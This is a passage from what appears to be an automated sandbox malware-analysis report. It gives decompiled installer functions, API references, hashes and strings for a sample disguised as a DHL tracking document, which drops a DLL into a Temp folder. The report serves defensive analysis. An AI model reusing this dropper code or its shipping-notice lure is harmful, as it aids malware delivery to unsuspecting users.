                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                    • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                    • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                    • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 51%
                    			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                    				char _v36;
                    				char _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t26;
                    				void* _t34;
                    				signed int _t36;
                    				signed int _t39;
                    				unsigned int _t46;
                    
                    				_t46 = _a12;
                    				_push(0x14);
                    				_pop(0);
                    				_t34 = 0xffffffdc;
                    				if(_t46 < 0x100000) {
                    					_push(0xa);
                    					_pop(0);
                    					_t34 = 0xffffffdd;
                    				}
                    				if(_t46 < 0x400) {
                    					_t34 = 0xffffffde;
                    				}
                    				if(_t46 < 0xffff3333) {
                    					_t39 = 0x14;
                    					asm("cdq");
                    					_t46 = _t46 + 1 / _t39;
                    				}
                    				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                    				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                    				_t21 = _t46 & 0x00ffffff;
                    				_t36 = 0xa;
                    				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                    				_push(_t46 >> 0);
                    				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                    				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                    				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                    			}














                    APIs
                    • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                    • wsprintfA.USER32 ref: 004046A6
                    • SetDlgItemTextA.USER32 ref: 004046B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                    • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                    • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                    • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 51%
                    			E00401BAD() {
                    				signed int _t28;
                    				CHAR* _t31;
                    				long _t32;
                    				int _t37;
                    				signed int _t38;
                    				int _t42;
                    				int _t48;
                    				struct HWND__* _t52;
                    				void* _t55;
                    
                    				 *(_t55 - 0x34) = E004029CB(3);
                    				 *(_t55 + 8) = E004029CB(4);
                    				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                    					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                    				}
                    				__eflags =  *(_t55 - 0x10) & 0x00000002;
                    				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                    					 *(_t55 + 8) = E004029E8(0x44);
                    				}
                    				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                    				_push(1);
                    				if(__eflags != 0) {
                    					_t50 = E004029E8();
                    					_t28 = E004029E8();
                    					asm("sbb ecx, ecx");
                    					asm("sbb eax, eax");
                    					_t31 =  ~( *_t27) & _t50;
                    					__eflags = _t31;
                    					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                    					goto L10;
                    				} else {
                    					_t52 = E004029CB();
                    					_t37 = E004029CB();
                    					_t48 =  *(_t55 - 0x10) >> 2;
                    					if(__eflags == 0) {
                    						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                    						L10:
                    						 *(_t55 - 8) = _t32;
                    					} else {
                    						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                    						asm("sbb eax, eax");
                    						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                    					}
                    				}
                    				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                    				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                    					_push( *(_t55 - 8));
                    					E004059E3();
                    				}
                    				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                    				return 0;
                    			}













                    APIs
                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                    • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                    • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                    • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403897(void* __ecx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed short _t6;
                    				intOrPtr _t11;
                    				signed int _t13;
                    				intOrPtr _t15;
                    				signed int _t16;
                    				signed short* _t18;
                    				signed int _t20;
                    				signed short* _t23;
                    				intOrPtr _t25;
                    				signed int _t26;
                    				intOrPtr* _t27;
                    
                    				_t24 = "1033";
                    				_t13 = 0xffff;
                    				_t6 = E004059FC(__ecx, "1033");
                    				while(1) {
                    					_t26 =  *0x423ee4; // 0x1
                    					if(_t26 == 0) {
                    						goto L7;
                    					}
                    					_t15 =  *0x423eb0; // 0x50f930
                    					_t16 =  *(_t15 + 0x64);
                    					_t20 =  ~_t16;
                    					_t18 = _t16 * _t26 +  *0x423ee0;
                    					while(1) {
                    						_t18 = _t18 + _t20;
                    						_t26 = _t26 - 1;
                    						if((( *_t18 ^ _t6) & _t13) == 0) {
                    							break;
                    						}
                    						if(_t26 != 0) {
                    							continue;
                    						}
                    						goto L7;
                    					}
                    					 *0x423680 = _t18[1];
                    					 *0x423f48 = _t18[3];
                    					_t23 =  &(_t18[5]);
                    					if(_t23 != 0) {
                    						 *0x42367c = _t23;
                    						E004059E3(_t24,  *_t18 & 0x0000ffff);
                    						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "nkdpnsqeoocyepqnevm Setup", 0xfffffffe));
                    						_t11 =  *0x423ecc; // 0x2
                    						_t27 =  *0x423ec8; // 0x50fadc
                    						if(_t11 == 0) {
                    							L15:
                    							return _t11;
                    						}
                    						_t25 = _t11;
                    						do {
                    							_t11 =  *_t27;
                    							if(_t11 != 0) {
                    								_t5 = _t27 + 0x18; // 0x50faf4
                    								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
                    							}
                    							_t27 = _t27 + 0x418;
                    							_t25 = _t25 - 1;
                    						} while (_t25 != 0);
                    						goto L15;
                    					}
                    					L7:
                    					if(_t13 != 0xffff) {
                    						_t13 = 0;
                    					} else {
                    						_t13 = 0x3ff;
                    					}
                    				}
                    			}


















                    APIs
                    • SetWindowTextA.USER32(00000000,nkdpnsqeoocyepqnevm Setup), ref: 0040392F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: TextWindow
                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\$nkdpnsqeoocyepqnevm Setup
                    • API String ID: 530164218-3505690716
                    • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                    • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                    • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                    • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004052E5(CHAR* _a4) {
                    				struct _PROCESS_INFORMATION _v20;
                    				int _t7;
                    
                    				0x4224a0->cb = 0x44;
                    				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
                    				if(_t7 != 0) {
                    					CloseHandle(_v20.hThread);
                    					return _v20.hProcess;
                    				}
                    				return _t7;
                    			}






                    APIs
                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                    • CloseHandle.KERNEL32(?), ref: 00405317
                    Strings
                    • Error launching installer, xrefs: 004052F8
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                    • API String ID: 3712363035-4043152584
                    • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                    • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                    • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                    • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405578(CHAR* _a4) {
                    				CHAR* _t7;
                    
                    				_t7 = _a4;
                    				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                    					lstrcatA(_t7, 0x40900c);
                    				}
                    				return _t7;
                    			}





                    APIs
                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                    • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-3936084776
                    • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                    • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                    • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                    • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00401EC5(char __ebx, char* __edi, char* __esi) {
                    				char* _t18;
                    				int _t19;
                    				void* _t30;
                    
                    				_t18 = E004029E8(0xffffffee);
                    				 *(_t30 - 0x2c) = _t18;
                    				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                    				 *__esi = __ebx;
                    				 *(_t30 - 8) = _t19;
                    				 *__edi = __ebx;
                    				 *((intOrPtr*)(_t30 - 4)) = 1;
                    				if(_t19 != __ebx) {
                    					__eax = GlobalAlloc(0x40, __eax);
                    					 *(__ebp + 8) = __eax;
                    					if(__eax != __ebx) {
                    						if(__eax != 0) {
                    							__ebp - 0x44 = __ebp - 0x34;
                    							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                    								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                    								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                    								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                    							}
                    						}
                    						_push( *(__ebp + 8));
                    						GlobalFree();
                    					}
                    				}
                    				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                    				return 0;
                    			}







                    APIs
                    • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                    • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                    • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                      • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                    • String ID:
                    • API String ID: 1404258612-0
                    • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                    • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                    • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                    • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E00401D1B() {
                    				void* __esi;
                    				int _t6;
                    				signed char _t11;
                    				struct HFONT__* _t14;
                    				void* _t18;
                    				void* _t24;
                    				void* _t26;
                    				void* _t28;
                    
                    				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                    				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                    				 *0x40af7c = E004029CB(3);
                    				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                    				 *0x40af83 = 1;
                    				 *0x40af80 = _t11 & 0x00000001;
                    				 *0x40af81 = _t11 & 0x00000002;
                    				 *0x40af82 = _t11 & 0x00000004;
                    				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                    				_t14 = CreateFontIndirectA(0x40af6c);
                    				_push(_t14);
                    				_push(_t26);
                    				E004059E3();
                    				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                    				return 0;
                    			}












                    APIs
                    • GetDC.USER32(?), ref: 00401D22
                    • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                    • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirect
                    • String ID:
                    • API String ID: 3272661963-0
                    • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                    • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                    • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                    • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                    				long _t22;
                    
                    				if(_a8 != 0x102) {
                    					if(_a8 != 0x200) {
                    						_t22 = _a16;
                    						L7:
                    						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                    							 *0x420480 = _t22;
                    							E00405A85(0x420498, 0x424000);
                    							E004059E3(0x424000, _t22);
                    							E0040140B(6);
                    							E00405A85(0x424000, 0x420498);
                    						}
                    						L11:
                    						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                    					}
                    					if(IsWindowVisible(_a4) == 0) {
                    						L10:
                    						_t22 = _a16;
                    						goto L11;
                    					}
                    					_t22 = E004046F2(_a4, 1);
                    					_a8 = 0x419;
                    					goto L7;
                    				}
                    				if(_a12 != 0x20) {
                    					goto L10;
                    				}
                    				E00403E83(0x413);
                    				return 0;
                    			}





                    APIs
                    • IsWindowVisible.USER32(?), ref: 00404DA9
                    • CallWindowProcA.USER32 ref: 00404E17
                      • Part of subcall function 00403E83: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E95
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                    • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                    • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                    • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                    				int _t5;
                    				long _t7;
                    				struct _OVERLAPPED* _t11;
                    				intOrPtr* _t15;
                    				void* _t17;
                    				int _t21;
                    
                    				_t15 = __esi;
                    				_t11 = __ebx;
                    				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                    					_t7 = lstrlenA(E004029E8(0x11));
                    				} else {
                    					E004029CB(1);
                    					 *0x409f68 = __al;
                    				}
                    				if( *_t15 == _t11) {
                    					L8:
                    					 *((intOrPtr*)(_t17 - 4)) = 1;
                    				} else {
                    					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll", _t7, _t17 + 8, _t11);
                    					_t21 = _t5;
                    					if(_t21 == 0) {
                    						goto L8;
                    					}
                    				}
                    				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
                    				return 0;
                    			}










                    APIs
                    • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                    Strings
                    • C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll, xrefs: 004024BC, 004024E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileWritelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll
                    • API String ID: 427699356-2009072728
                    • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                    • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                    • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                    • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004055BF(char* _a4) {
                    				char* _t3;
                    				char* _t5;
                    
                    				_t5 = _a4;
                    				_t3 =  &(_t5[lstrlenA(_t5)]);
                    				while( *_t3 != 0x5c) {
                    					_t3 = CharPrevA(_t5, _t3);
                    					if(_t3 > _t5) {
                    						continue;
                    					}
                    					break;
                    				}
                    				 *_t3 =  *_t3 & 0x00000000;
                    				return  &(_t3[1]);
                    			}






                    APIs
                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 004055C5
                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 004055D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
